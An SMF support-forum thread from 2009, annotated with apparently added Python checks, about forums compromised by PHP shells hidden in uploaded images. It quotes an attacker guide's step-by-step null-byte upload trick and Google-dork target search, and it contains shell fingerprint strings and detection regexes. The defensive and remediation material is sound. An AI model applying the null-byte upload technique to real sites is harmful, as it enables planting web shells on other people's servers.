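Added example (not from this thread or from SMF) addressing the two questions above: whether a size match is enough, and what robone was looking for in a script that compares what should be on the server with what is there. A single added byte defeats `grep "229051"`, so the example instead hashes a known-clean copy of the install into a manifest, diffs it against the live tree to list added, removed and modified files, and runs a few content indicators over every file (including "images" in the upload directories, which Kindred notes can carry PHP). The `UPLOAD_DIRS` names, the indicator list and the sample file layout are assumptions for illustration; the remote-include indicator corresponds to the URL-include behaviour discussed just above.

```python
"""Baseline-vs-live integrity check plus content indicators for PHP trees.

Added example. Size is a weak signal; a SHA-256 manifest of the clean
distribution and a handful of content regexes survive trivial edits.
"""
import hashlib
import os
import re
from typing import Dict, Iterator, List, Tuple

# Content indicators as byte regexes so they also run over non-PHP files.
SUSPICIOUS_PATTERNS = [
    ("eval-of-decoded-blob",
     re.compile(rb"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")),
    ("eval-of-request-input",
     re.compile(rb"eval\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b")),
    ("command-exec-of-request-input",
     re.compile(rb"(?:system|passthru|shell_exec|exec|popen)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b")),
    ("preg_replace-e-modifier",
     re.compile(rb"preg_replace\s*\(\s*['\"][^'\"]*/[a-zA-Z]*e[a-zA-Z]*['\"]")),
    ("remote-include",
     re.compile(rb"(?:include|require)(?:_once)?\s*\(?\s*['\"]https?://")),
]
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)")
# Assumed upload directory names (relative to the forum root) where no PHP should ever appear.
UPLOAD_DIRS = ("attachments", "avatars")


def _relpaths(root: str) -> Iterator[Tuple[str, str]]:
    """Yield (absolute path, forward-slash relative path) for every file under root."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            yield full, os.path.relpath(full, root).replace(os.sep, "/")


def build_manifest(root: str) -> Dict[str, str]:
    """Map every file's relative path to its SHA-256 hex digest."""
    manifest = {}
    for full, rel in _relpaths(root):
        h = hashlib.sha256()
        with open(full, "rb") as fh:
            for chunk in iter(lambda: fh.read(65536), b""):
                h.update(chunk)
        manifest[rel] = h.hexdigest()
    return manifest


def compare_manifests(baseline: Dict[str, str], live: Dict[str, str]) -> Dict[str, List[str]]:
    """Diff a known-good manifest against the live tree's manifest."""
    return {
        "added": sorted(p for p in live if p not in baseline),
        "removed": sorted(p for p in baseline if p not in live),
        "modified": sorted(p for p in live if p in baseline and live[p] != baseline[p]),
    }


def scan_content(data: bytes, rel: str) -> List[str]:
    """Return the indicator labels that fire on one file's bytes."""
    hits = [label for label, rx in SUSPICIOUS_PATTERNS if rx.search(data)]
    top = rel.split("/", 1)[0]
    # Any PHP open tag inside an upload directory is suspect regardless of extension.
    if top in UPLOAD_DIRS and PHP_OPEN_TAG.search(data):
        hits.append("php-tag-in-upload-dir")
    return hits


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Run the content indicators over every file under root."""
    findings = {}
    for full, rel in _relpaths(root):
        with open(full, "rb") as fh:
            hits = scan_content(fh.read(), rel)
        if hits:
            findings[rel] = hits
    return findings


if __name__ == "__main__":
    import json
    import sys
    # Usage: python integrity_check.py /path/to/clean_smf_copy /path/to/live/forum
    report = {"diff": compare_manifests(build_manifest(sys.argv[1]), build_manifest(sys.argv[2])),
              "indicators": scan_tree(sys.argv[2])}
    print(json.dumps(report, indent=2))
```

Build the baseline from the untouched SMF package plus your own mod and theme files (taken from a copy you trust, not from the live server), and treat "added" entries under the upload directories and "modified" entries anywhere as the first things to read.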
Title: Re: Hacked, script injection
Post by: Faded Glory on May 18, 2009, 07:49:05 PM
here's the IP I had for the krisbarteo guy: 94.142.129.147

is this the same IP everyone else found? if he was dumb enough not to use a proxy I think a call to his ISP is in order - at the very least...

That IP goes back to RIPE. It may as well be a proxy for all the good it does to try to track it. RIPE could care less.
Title: Re: Hacked, script injection
Post by: Ben_S on May 18, 2009, 07:52:21 PM
Err, do you even know what RIPE is? Why would RIPE care? Look up the IP with RIPE and see who it's actually allocated to; odds are, though, it's a zombie anyway.
Title: Re: Hacked, script injection
Post by: Antechinus on May 18, 2009, 08:02:59 PM
The IP tracks to Latvia. I checked. Personally I banned a substantial IP range last night. 
Title: Re: Hacked, script injection
Post by: Night09 on May 18, 2009, 09:42:50 PM
The idiot tried to register on my forums but we're on member approval, so I have set this ban for the IP: 94.142.129.*

If he comes back I will change it to the 129 octet instead.
Title: Re: Hacked, script injection
Post by: Faded Glory on May 19, 2009, 01:46:59 AM
Err, do you even know what RIPE is, why would RIPE care. Lookup the IP with RIPE and see who its actually allocated to, odds are though it's a zombie anyway.

Yes my dear I do understand what RIPE is. Because I know everyone is under a bit of strain, I won't take offense at being talked down to.

Now if anyone can track it further or make a complaint to them concerning this character, I would love to know how to do it too!

% This is the RIPE Whois query server #3.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: This output has been filtered.
%       To receive output for a database update, use the "-B" flag.
% Information related to '94.142.129.128 - 94.142.129.255'
inetnum:         94.142.129.128 - 94.142.129.255
netname:         CSSGROUP-NET
descr:           SIA "CSS GROUP" hosting
org:             ORG-SG55-RIPE
country:         LV
admin-c:         CGN-RIPE
tech-c:          CGN-RIPE
status:          ASSIGNED PA
mnt-by:          CSSGROUP-MNT
source:          RIPE # Filtered
organisation:    ORG-SG55-RIPE
org-name:        SIA "CSS GROUP"
org-type:        LIR
address:         SIA "CSS GROUP"
                Caunas 7A-26
                LV-4101 Cesis
                LATVIA
phone:           +371 67 404544
fax-no:          +371 67 414545
admin-c:         DJ1401-RIPE
mnt-ref:         CSSGROUP-MNT
mnt-ref:         RIPE-NCC-HM-MNT
mnt-by:          RIPE-NCC-HM-MNT
source:          RIPE # Filtered
role:            CSS GROUP NOC
address:         Caunas 7A-26, Cesis, LV-4101, Latvia
phone:           +371 67 404544
fax-no:          +371 67 414545
abuse-mailbox:   noc@cssgroup.lv
admin-c:         DJ1401-RIPE
tech-c:          AC13043-RIPE
nic-hdl:         CGN-RIPE
source:          RIPE # Filtered
% Information related to '94.142.128.0/21AS48662'
route:           94.142.128.0/21
descr:           SIA "CSS GROUP"
origin:          AS48662
mnt-by:          CSSGROUP-MNT
source:          RIPE # Filtered
Title: Re: Hacked, script injection
Post by: JBlaze on May 19, 2009, 01:49:46 AM
Thanks Faded. But that's as far as we get.

So far, I've been able to track it down to a certain area of Latvia, but that doesn't really help. It could also very well be a proxy.

Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 19, 2009, 02:04:12 AM
No proxy on 94.142.129.147

IP address: 94.142.129.147
IP country code: LV 
IP address country:  Latvia 
IP address state: Césu 
IP address city: Cesis 
IP address latitude: 57.299999 
IP address longitude: 25.250000 
ISP of this IP: SIA CSS GROUP 
Organization: SIA CSS GROUP hosting
 
Local time in Latvia: 2009-05-19 09:02

organisation: ORG-SG55-RIPE
org-name: SIA "CSS GROUP"
org-type: LIR
address: SIA "CSS GROUP"
Caunas 7A-26
LV-4101 Cesis
LATVIA
phone: +371 67 404544
fax-no: +371 67 414545
admin-c: DJ1401-RIPE
mnt-ref: CSSGROUP-MNT
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
source: RIPE # Filtered

role: CSS GROUP NOC
address: Caunas 7A-26, Cesis, LV-4101, Latvia
phone: +371 67 404544
fax-no: +371 67 414545
abuse-mailbox: noc@cssgroup.lv

:D
Title: Re: Hacked, script injection
Post by: Faded Glory on May 19, 2009, 02:06:14 AM
Thank you JBlaze.

I was one of the lucky ones that had the StopForumSpam on my site and he didn't even get to register.

I feel really bad for all of those he did get to and hit so hard.

Again Let me say I am truly in awe of how much time and effort you and the rest of the team have put into this problem, and helping those that got hit to restore their forums.

I know of no other software operation that goes to such lengths and does not get paid for it!

So if someone forgets to say thanks I have just said it for them!
Title: Re: Hacked, script injection
Post by: thebofh on May 19, 2009, 05:01:42 AM
I just had Fire768 from 115.146.185.14 blocked by the stop spam mod.
Title: Re: Hacked, script injection
Post by: mrsax2000 on May 19, 2009, 06:23:59 AM
I'd like to review the table in MySQL, but I don't have a tool for viewing the database. What do you recommend?
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 19, 2009, 06:25:57 AM
Are you sure you don't have any means to access it?
Most hosts provide you with phpmyadmin as a part of your hosting control panel,
or as a separate script you can access.

If you really don't have any, phpmyadmin is relatively easy to setup by yourself as well,
just make sure to never leave it in a web-accessible folder for longer than you have to - as it can be a major security risk.
Title: Re: Hacked, script injection
Post by: robone on May 19, 2009, 07:49:07 AM
Found the following document : http://209.85.229.132/search?q=cache:jyfd9Npg9dsJ:forum.eviloctal.com/attachment.php%3Faid%3D5197+how+to+find+c99.php+on+website&cd=26&hl=en&ct=clnk

The document is called "The Website Attack Guide" and it goes into some interesting things, but I will extract how they get C99 onto a website. It looks like that is how they got it onto mine:

First of all, what is a 'Null Byte'? A null character/null byte/null terminator is a character with a value of zero that is shown in the ASCII chart. And, in programming languages (php included) the null byte is used as what's known as a 'string terminator'. When the null byte is read the string ends. The null byte is represented with '%00' in php. We are able to harness the 'power' of the null byte to trick a picture upload form into letting us upload our own phpshell. There are a lot of websites with image uploading features, so they are not hard to find. You can use the Google dork: "Upload Image" to find some of them. Now that we have a target we are able to start exploiting.

Go to your target's upload page and click the 'Browse' button and navigate to a php shell. Just for the sake of Proof of Concept, try to upload this file normally. You will get an error such as: "We're sorry, but the file you entered is using an extension that is not allowed. Images only please!" We see from this that only images are supported - and a regular php shell will not work. Let's browse to our shell again, but this time we will change the upload bar to look like this, adding in the nullbyte character: C:\c99.php%00.jpg

When the script checks our file it will see the .jpg and 'say' "Yep, looks like an image to me" and upload it. Fortunately for us, when the file is actually uploaded it is uploaded with the .php extension because the null byte terminates anything after that.

If it worked we will see: "Thank you for uploading your pictures - view your file at /c99.php" This concludes the first null byte exploitation article I will write. The second will be on exploiting cgi files using the null byte


So, it is important to make sure that you restrict access to being able to upload avatars or attachments until you have established that the member is not someone trying to get into your system.


Found this shell php scanner    http://www.darkmindz.com/codebase/php-simple-php-shell-scanner-num508.html

Will someone who knows php tell me if this is okay to use?? And do you think it will work??
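The quoted guide turns on one weak check: the upload form looks only at the trailing extension, while the filesystem call that writes the file stops at the NUL byte. The following is an added example (not SMF code, and not from the guide) showing that weak check beside a hardened one; the function names, the extension allowlist and the sample filenames are my own:

```python
"""Naive vs. hardened upload-name checks for the null-byte trick.

Added example, not SMF code. The filenames and bytes used below are
constructed samples.
"""
import re

# Extension allowlist an image-upload form might use (assumed, illustrative).
IMAGE_EXTENSIONS = {"jpg", "jpeg", "gif", "png"}

# Leading bytes of the formats above, for a content check that does not
# trust the filename at all.
IMAGE_MAGIC = (b"\xff\xd8\xff", b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n")


def naive_extension_ok(filename: str) -> bool:
    """The weak check the guide describes: look only at the last extension.

    'c99.php\\0.jpg' ends in '.jpg', so it passes, even though a C-based
    filesystem call stops at the NUL and writes 'c99.php'.
    """
    return filename.lower().rsplit(".", 1)[-1] in IMAGE_EXTENSIONS


def hardened_upload_name(filename: str) -> str:
    """Return a safe stored name, or raise ValueError.

    - reject any control character (this covers the NUL terminator)
    - drop directory components so the upload cannot leave its folder
    - allow exactly one extension, taken from the allowlist
    """
    if any(ord(c) < 0x20 or c == "\x7f" for c in filename):
        raise ValueError("control character in filename")
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    m = re.fullmatch(r"([A-Za-z0-9_-]{1,64})\.([A-Za-z0-9]{1,5})", base)
    if not m:
        raise ValueError("filename does not match name.ext")
    stem, ext = m.group(1), m.group(2).lower()
    if ext not in IMAGE_EXTENSIONS:
        raise ValueError("extension not allowed")
    return f"{stem}.{ext}"


def looks_like_image(data: bytes) -> bool:
    """Check the first bytes against known image signatures.

    This is the check that matters when an uploaded 'image' is really PHP:
    a file starting with '<?php' has none of these headers.
    """
    return data.startswith(IMAGE_MAGIC)


def accept_upload(filename: str, data: bytes):
    """Apply both checks; return the stored name, or None if rejected."""
    try:
        name = hardened_upload_name(filename)
    except ValueError:
        return None
    return name if looks_like_image(data) else None


if __name__ == "__main__":
    # Constructed samples: the null-byte name from the guide and a PHP
    # payload disguised as a GIF.
    bad_name = "c99.php\x00.jpg"
    print(naive_extension_ok(bad_name))                    # True: weak check fooled
    print(accept_upload(bad_name, b"GIF89a\x01\x00"))      # None
    print(accept_upload("avatar.gif", b"<?php echo 1;"))   # None
    print(accept_upload("avatar.gif", b"GIF89a\x01\x00"))  # avatar.gif
```

Two points worth noting. Rejecting control characters closes the NUL trick at the name check, but the content check is the one that still matters afterwards: a file that really is PHP can carry a perfectly valid image name, which is exactly the one-pixel-avatar case later in this thread. And since PHP 5.3.4 the filesystem functions themselves refuse paths that contain a NUL byte, so on current servers the extension trick described above fails even without this check; the magic-byte check is what remains essential.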
Title: Re: Hacked, script injection
Post by: demount on May 19, 2009, 10:15:12 AM
It is not necessary to ban anything, because 94.142.129.147 and other IPs are simple dedicated servers, working under Win2003 (sometimes WinXP). Port 3389, MS terminal service, is open. That guy just launched an attack through (or maybe from) those workstations by remote desktop. Also there is a possibility that he used a chain of such workstations, so detecting his real IP is a difficult task.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 19, 2009, 10:23:47 AM
<<< The document is called "The Website Attack Guide" and it goes into some interesting things, but I will extract how they get C99 onto a website. It looks like that is how they got it onto mine: >>>

This sounds like what that zaphodb777 guy was talking about. Has anybody looked at the outfit he linked to? It actually looks legit to me and possibly helpful. Can't fault a guy for plugging his wares if they're above board.
Title: Re: Hacked, script injection
Post by: bri on May 19, 2009, 10:35:18 AM
If you are describing the methods you are using to combat the terrorists, you may want to not link your forum in your sig line... ;)
Title: Re: Hacked, script injection
Post by: mghq on May 19, 2009, 09:29:28 PM
Me and my friend did some researching on kris.
Here is some
He is running Microsoft Windows Server 2003 with Service Pack 2
He has port 3389 which is Microsoft RDP.
And from our scan he breaks into networks
Title: Re: Hacked, script injection
Post by: mghq on May 19, 2009, 09:36:19 PM
He/she is also a linux hacker.
http://www.ip-adress.com/ip_tracer/94.142.129.147
Title: Re: Hacked, script injection
Post by: rusgard on May 20, 2009, 03:18:57 AM
Hi,
I also have krisbarteo in my board (v1.18), registered on 17 May 2009.

I searched for style.css.php and other files too. But i found nothing.
The content of the *.php files looks also fine.

What can I do to check if I have a clean installation without corruption?

Many Thanks
rusgard

EDIT:
I found krisbarteo in another Board (v2.0 RC1 - hosted by myself) too!!
But nothing changed...no new files,  php-files looking well....
Title: Re: Hacked, script injection
Post by: Night09 on May 20, 2009, 08:06:40 AM
Quote
I found krisbarteo in another Board (v2.0 RC1 - hosted by myself) too!!
But nothing changed...no new files,  php-files looking well....

It's possible that he has tried to infect so many sites he hasn't had time to actually visit them all to do any damage yet. Although he could have a bot registering, it may require him as a human to complete some of the hacking, so having him register may not mean an automatic compromise.

It may be you have caught this in time and stopped him before he had chance to infect your site.
Title: Re: Hacked, script injection
Post by: Jorin on May 20, 2009, 08:11:10 AM
It may be you have caught this in time and stopped him before he had chance to infect your site.

Let us hope he banned krisbarteo completely.  ;)
Title: Re: Hacked, script injection
Post by: rusgard on May 20, 2009, 08:24:05 AM
It may be you have caught this in time and stopped him before he had chance to infect your site.

Let us hope he banned krisbarteo completely.  ;)

I banned him ;)
(i hope it's enough to ban the user...also i deactivated the avatar and theme functions...)
Title: Re: Hacked, script injection
Post by: robone on May 20, 2009, 08:45:38 AM
Further to my previous email, can anyone who knows php tell me if this script below will work to look for C99 PHP Shells and others, on the forum:

Code: [Select]
#!/usr/bin/php
<?php
/*
*    this script finds some shells like
*    c99, c100, r57, erne, Safe_Over
*    and tries to find unknown shells by searching for specific words; this can be
*    not safe (false positives are possible)
*
*      how to use:
*      the script does not need any of these parameters, they are optional
*      -e Y/N enable/disable heuristic mode (default is enabled)
*      -p a number 1-100, the percentage of words that must be found in the file to trigger the heuristic alert
*      -f check a single file
*      -d check a single dir (normally the program recursively checks ALL files)
*        powered by Dr. nefasto
*/
// Words that commonly occur in PHP shells; used only by the heuristic check.
$euristic__ = array("fopen", "file(", "file_get_contents", "sql", "opendir", "perms", "port", "eval", "system", "exec", "rename", "copy", "delete", "hack", "(\$_", "phpinfo", "uname", "glob", "is_writable", "is_readable", "get_magic_quotes_gpc()", "move_uploaded_file", "\$dir", "& 00", "get");
// Three fingerprints per known shell; all three must match to name the shell.
$word__ = array(
    "c99" => array("c999shexit();", "setcookie(\"c999sh_surl\");", "c999_buff_prepare();"),
    "c100" => array("\$back_connect_c=\"f0VMRgEBAQA", "function myshellexec(\$command) {", "tEY87ExcilDfgAMhwqM74s6o"),
    "r57" => array("if(strpos(ex(\"echo abcr57\"),\"r57\")!=3)", "function ex(\$cfe)", "\$port_bind_bd_c=\"I2luY2x1ZGUg"),
    "erne" => array("function unix2DosTime(\$unixtime = 0)", "eh(\$errno, \$er", "\$mtime=@date(\"Y-m-d H:i:s\",@filemti"),
    "Safe_Over" => array("function walkArray(\$array){", "function printpagelink(\$a, \$b, \$link = \"\")", "if (\$cmd != \"downl\")"),
    "cmd_asp" => array("   ' -- Read th", "ll oFileSys.D", "Author: Maceo")
);
// the script work
$euristic_active = true;
$euristic_sens = 40;
for ($i = 1; $i < $argc; $i++)
{
    if ($argv[$i] == "-h")
        help($argv[0]);
    elseif ($argv[$i] == "-e" && isset($argv[$i+1]))
    {
        if ($argv[$i+1] == "Y") $euristic_active = true;
        if ($argv[$i+1] == "N") $euristic_active = false;
    }
    elseif ($argv[$i] == "-p" && isset($argv[$i+1]))
        $euristic_sens = intval($argv[$i+1]);
    elseif ($argv[$i] == "-d" && isset($argv[$i+1]))
    {
        dir_scan($argv[$i+1]);
        exit;
    }
    elseif ($argv[$i] == "-f" && isset($argv[$i+1]))
    {
        a($argv[$i+1]);
        exit;
    }
}
dir_scan(".");

// Recursively scan every file below $name, skipping this script itself.
function dir_scan($name)
{
    if (!is_dir($name))
        echo "$name is not a dir\n";
    if ($o = @opendir($name))
    {
        while (false !== ($file = readdir($o)))
        {
            if ($file == '.' or $file == '..' or $file == basename(__FILE__)) { continue; }
            else if (is_dir($name."/".$file)) { dir_scan($name."/".$file); }
            else
                a($name."/".$file);
        }
        closedir($o);
    }
    else
        echo "i can't open $name dir\n";
}
// Scan one file: fingerprint match first, heuristic word count second.
function a($file)
{
    global $euristic_active;
    global $euristic_sens;
    if ($l = file_get_contents($file))
    {
        if ($shell = check($l))
        {
            echo "[DANGER] word_list > ".$file."\tprobably ".$shell." shell\n";
        }
        else if ($euristic_active)
            if (($t = check_euristic($l)) and $t > $euristic_sens)
            {
                echo "[_ALERT] euristic $t%> ".$file."\tprobably is a shell\n";
            }
    }
    else
    {
        echo "i can't open $file file\n";
    }
}
// Returns the shell name when all three of its fingerprints are present, else false.
function check($string)
{
    global $word__;
    foreach ($word__ as $shell => $code)
    {
        $check = 0; // reset per shell so matches from different shells are not added up
        foreach ($code as $microcode)
            if (stripos($string, $microcode) !== false)
            {
                $check++;
                if ($check == 3) return $shell;
            }
    }
    return false;
}
// Returns the percentage of heuristic words found in the file.
function check_euristic($string)
{
    global $euristic__;
    $check = 0;
    foreach ($euristic__ as $code)
        if (stripos($string, $code) !== false)
            $check++;
    return intval(($check * 100) / count($euristic__));
}
function help($me)
{
    echo "Dr. nefasto shell scanner\n".
        "$me {-e [euristic method default = Y] Y/N   -p [[0-100] euristic sensibility fewer == most feeble ]   [-d [directory] / -f [file] ]}\n".
        "exemple: $me -e N -d /tmp\n";
    exit;
}
?>


I am a bit scared to use it, as I do not know what the outcome will be.

But if it works, this will be what should be run every so often to ensure a site is safe, because as mentioned previously, I found two C99 shells on my site and am still trying to clean up the code inserted in all my php files.
Title: Re: Hacked, script injection
Post by: Sarge on May 20, 2009, 09:12:12 AM
Further to my previous email, can anyone who knows php tell me if this script below will work to look for C99 PHP Shells and others, on the forum:

I don't think this script will work.
Title: Re: Hacked, script injection
Post by: robone on May 20, 2009, 09:29:08 AM
Okay......I accept your expertise....... but someone has posted it on a site as a means of detecting PHP shells such as C99, so there must be some validity to it.

Either it works, or it needs tweaking to make it work, or it is pure garbage, or it will add to one's problems.

Is there anything in it that will harm my forum?? If not, I will give it a bash and see what happens.

So, comments will be appreciated
Title: Re: Hacked, script injection
Post by: Sarge on May 20, 2009, 09:56:20 AM
robone, what I'm trying to say is that the script you posted does not work on the particular kind of exploit that is being discussed here. It is a modified and "encrypted" copy of the c99 shell, so I think that the script you posted will not detect it at all.

But if you want to give it a try, I suggest getting a full backup first...

I happen to know that a cleaning script for this specific attack is being worked on, so I'll let you know if/when I have more info.
Title: Re: Hacked, script injection
Post by: robone on May 20, 2009, 10:13:19 AM
Okay..thanks...I will wait
Title: Re: Hacked, script injection
Post by: M-DVD on May 20, 2009, 10:53:18 AM
I banned him ;)
(i hope it's enough to ban the user...also i deactivated the avatar and theme functions...)

This user has other aliases. But yes, it is better to ban him, but don't close your eyes :P

You can, instead of disabling avatar uploads, change the attachments dir. Afaik this is very (100%) effective.

The theme functions, enabled or disabled is equal.
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 20, 2009, 10:55:00 AM
You can not disable the upload avatar, instead you can change the dir attachments. afaik this is very effective.
No - changing dir would probably have 0 effect on this.

Quote
The theme functions, enabled or disabled is equal.
No. The theme functions play a role in this.

If you've already experienced the hack, I recommend virus scanning your computer as well.

Again, I'd suggest disabling your attachment and avatar uploads temporarily until the patch is out.  Everyone should also make sure there are no rows for themes in the themes table that should not exist.
Title: Re: Hacked, script injection
Post by: Geri Lx on May 20, 2009, 11:07:38 AM
Hi.
My forum was infected too. We cleaned the files and now we got no errors. Also banned the ip's, closed the avatar uploading, and the theme changing.
This topic was very helpful. Thanks to everybody for the efforts.

I am writing now because I want to say... Be aware! He is coming back.

I had three visits & login attempts today from that Latvian IP.

Title: Re: Hacked, script injection
Post by: babjusi on May 20, 2009, 11:09:54 AM

I am writing now because I want to say... Be aware! He is coming back.

The patch will be released soon and it won't matter anymore if he or whomever comes back.
Title: Re: Hacked, script injection
Post by: M-DVD on May 20, 2009, 11:32:22 AM
You can not disable the upload avatar, instead you can change the dir attachments. afaik this is very effective.
No - changing dir would probably have 0 effect on this.

Afaik it is very effective. Why? Because...

How does the spammer make the injection if he doesn't know the real attachment dir?

i.e., how does the spammer make an injection with a "correct attachment dir"?

Quote
The theme functions, enabled or disabled is equal.
No. The theme functions play a role in this.

I could do the injection and the "avatar inclusion" with the theme change functions disabled

Yes, they play a role in this, but this role isn't turned off if the theme changing functions are disabled  :)
Title: Re: Hacked, script injection
Post by: Jorin on May 20, 2009, 11:50:36 AM
We suggest the following to protect from krisbarteo:

- Don't allow members to choose a theme.
- Don't allow members to upload an avatar or to use an avatar from another server.
- Don't allow attaching any kind of pictures, such as BMP, GIF, JPEG, JPG, TIF, PNG.
- Disable modifications like a gallery (which allow uploading picture files).
- Change the registration mode so an Administrator can approve new members.
- Ban the users "krisbarteo", "stilusmagic" and the e-mail address "stilusmagic@googlemail.com". If these users don't exist, create and ban them yourself.
- Check your webspace for unknown PHP files and check the SMF files for the code of krisbarteo.
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 20, 2009, 11:55:53 AM
You can not disable the upload avatar, instead you can change the dir attachments. afaik this is very effective.
No - changing dir would probably have 0 effect on this.

Afaik it is very effective.

How do you make the injection if you don't know the real attachment dir?

i.e., how do you make an injection with a "correct attachment dir"?
I don't know this hack thoroughly, but I do tend to think - How does SMF know the correct attachment dir?
I'd think that when you get in in the first place, it's enough that SMF knows the location - you don't have to...
Quote
Quote
The theme functions, enabled or disabled is equal.
No. The theme functions play a role in this.
I could do the injection and the "avatar inclusion" with the theme change functions disabled
Yes, they play a role in this, but this role isn't turned off if the theme changing functions are disabled  :)
OK - I won't argue, as I said - I don't know the hack too thoroughly...

But still, I would suggest that everyone acknowledges the advice given by team members here - as they probably know exactly what they are talking about ;)
Title: Re: Hacked, script injection
Post by: mghq on May 20, 2009, 12:06:52 PM
Luckily my forum has not been attacked because my server is unreachable at the moment.
This hack works by him uploading an approximately 1 pixel image which has php code in it. The php code then attacks and tries to create files and infect your other .php files
Title: Re: Hacked, script injection
Post by: Jorin on May 20, 2009, 12:28:57 PM
We already know this, thanks.  ;D
Title: Re: Hacked, script injection
Post by: M-DVD on May 20, 2009, 06:01:52 PM
Quote
SimpleMachines should have warned everybody through our SMF Admin panel - I'm sure it would have prevented many of the hackings.

We hope to release a patch in the next few days, but we've found some serious bugs as a result of the changes.

In the interim, I believe disabling attachments and user-uploaded avatars should prevent the injection from being uploaded.

We are already working on a patch for this which will be released once between the developers, the team, and the beta testers, we've worked all the bugs out.  If we released it right now, your attachment and avatar systems would not work.

I'd like to note that this is *not* just a patch to close a small hole, this is a patch to prevent this type of attack from being possible again.  This patch will beef up attachment and avatar security significantly.  Though it is technically a new security enhancement "feature", the patch will still cover 1.0, 1.1, and 2.0 despite all three being feature locked.

The reason for this change is twofold:
1.) The pattern of the last SMF exploits has been alterations of prior exploits pertaining to poisoned attachments and avatars.  Rather than close one small hole, we are opting to close the possibility of this type of attack coming up again.
2.) IE6 will pretty much run just about anything injected into an image blindly without thinking twice about it.  This could infect your computer (as others alluded to above).

If you've already experienced the hack, I recommend virus scanning your computer as well.

Again, I'd suggest disabling your attachment and avatar uploads temporarily until the patch is out.  Everyone should also make sure there are no rows for themes in the themes table that should not exist.

It's nice to know how you are working to fix this.

Currently what they are doing is testing, because the solution brings new problems, and they have been on this for several days.

A few days ago I made a "personal patch".
This patch/package first "closes the hole", and second (on all potentially affected sites) prevents including files by unduly manipulating the URL as this hacker does.

Ie, everything you said in the quote (except the point 2), with the difference that I have not had any side effects.

Yes, I don't know how they are working, or what they are doing, but if I can help, you can tell me.
Title: Re: Hacked, script injection
Post by: GKM Crow on May 20, 2009, 09:02:10 PM
Hi,

My forum has been hacked today by krisbarto; he came online for about 1 minute and uploaded an image, a very small dot, but I only found this an hour later. I searched the name and found this thread. I have banned him, removed the image from the database and attachments folder and I am currently going through all php files; so far I have not found a line at the top but I have found this in the gallery php file:

die(base64_decode('UG93ZXJlZCBieSBHYWxsZXJ5IEZvciBTTUYgIG1hZGUgYnkgdmJnYW1lcjQ1IGh0dHA6Ly93d3cuc21maGFja3MuY29t'));

Is that meant to be there ? I don't really know what i'm doing this is all new to me.

Thank you for any help
Title: Re: Hacked, script injection
Post by: Kindred on May 20, 2009, 09:09:27 PM
if you have read the thread, then you may note that we have discussed this...

if not, then the simple answer is NO, that is not supposed to be there. Likely you will have to clean more than that one file, too...
Title: Re: Hacked, script injection
Post by: GKM Crow on May 20, 2009, 09:17:11 PM
Thank You, I have read the entire thread, but as i am new to this i really wasn't sure and before i did anything i wanted to check with somebody that could confirm that it shouldn't be there.

I am checking all my php files now and so far that is the first one its in.

Thank You again
Title: Re: Hacked, script injection
Post by: mycousinvinny on May 20, 2009, 09:41:01 PM
I just banned krisbarteo from my site and although we have been having some page load lags and "can't connect to database" errors recently I don't know if he had done any damage, nor do I have a clue how to check. Is there anyone that can check my forum??

He did not have an avatar as far as i can tell!!

thanks very much

http://anything-goe.net/Forum

thanks again,

Vinny
Title: Re: Hacked, script injection
Post by: JBlaze on May 20, 2009, 09:42:39 PM
mycousinvinny, make sure to check all php files on line 1 for a string of "base64_decode()"

If you have that on ANY file, please let us know and we will do what we can to help.
Title: Re: Hacked, script injection
Post by: vbgamer45 on May 20, 2009, 09:47:32 PM
Hi,

My forum has been hacked today by krisbarto; he came online for about 1 minute and uploaded an image, a very small dot, but I only found this an hour later. I searched the name and found this thread. I have banned him, removed the image from the database and attachments folder and I am currently going through all php files; so far I have not found a line at the top but I have found this in the gallery php file:

die(base64_decode('UG93ZXJlZCBieSBHYWxsZXJ5IEZvciBTTUYgIG1hZGUgYnkgdmJnYW1lcjQ1IGh0dHA6Ly93d3cuc21maGFja3MuY29t'));

Is that meant to be there ? I don't really know what i'm doing this is all new to me.

Thank you for any help

That one is safe I place that for copyright reasons says
Powered by Gallery For SMF  made by vbgamer45 http://www.smfhacks.com
Title: Re: Hacked, script injection
Post by: JBlaze on May 20, 2009, 09:48:47 PM
Way to get us all hyped up vb :)
Title: Re: Hacked, script injection
Post by: GKM Crow on May 20, 2009, 10:07:28 PM
Hi,

My forum has been hacked today by krisbarto; he came online for about 1 minute and uploaded an image, a very small dot, but I only found this an hour later. I searched the name and found this thread. I have banned him, removed the image from the database and attachments folder and I am currently going through all php files; so far I have not found a line at the top but I have found this in the gallery php file:

die(base64_decode('UG93ZXJlZCBieSBHYWxsZXJ5IEZvciBTTUYgIG1hZGUgYnkgdmJnYW1lcjQ1IGh0dHA6Ly93d3cuc21maGFja3MuY29t'));

Is that meant to be there ? I don't really know what i'm doing this is all new to me.

Thank you for any help

That one is safe I place that for copyright reasons says
Powered by Gallery For SMF  made by vbgamer45 http://www.smfhacks.com

Thank You for letting me know.
Title: Re: Hacked, script injection
Post by: metallica48423 on May 20, 2009, 10:32:40 PM
For anyone who hasn't done so yet, 1.1.9 was released (http://www.simplemachines.org/community/index.php?topic=311899.0) tonight, patching this.   Please be sure to update your forums ASAP.

Thanks!

Edit: added link to the announcement topic.
Title: Re: Hacked, script injection
Post by: Sarge on May 20, 2009, 10:41:50 PM
1.1.9 was released tonight

/me says something about timezones ;)
Title: Re: Hacked, script injection
Post by: GKM Crow on May 20, 2009, 10:55:18 PM
I've just updated to 1.1.9  :) Thanks for this

I have gone through half of my php files and i haven't found anything wrong yet also database is looking ok. I am still checking them though. Would it be possible that i have caught him in time and i won't find anything ?

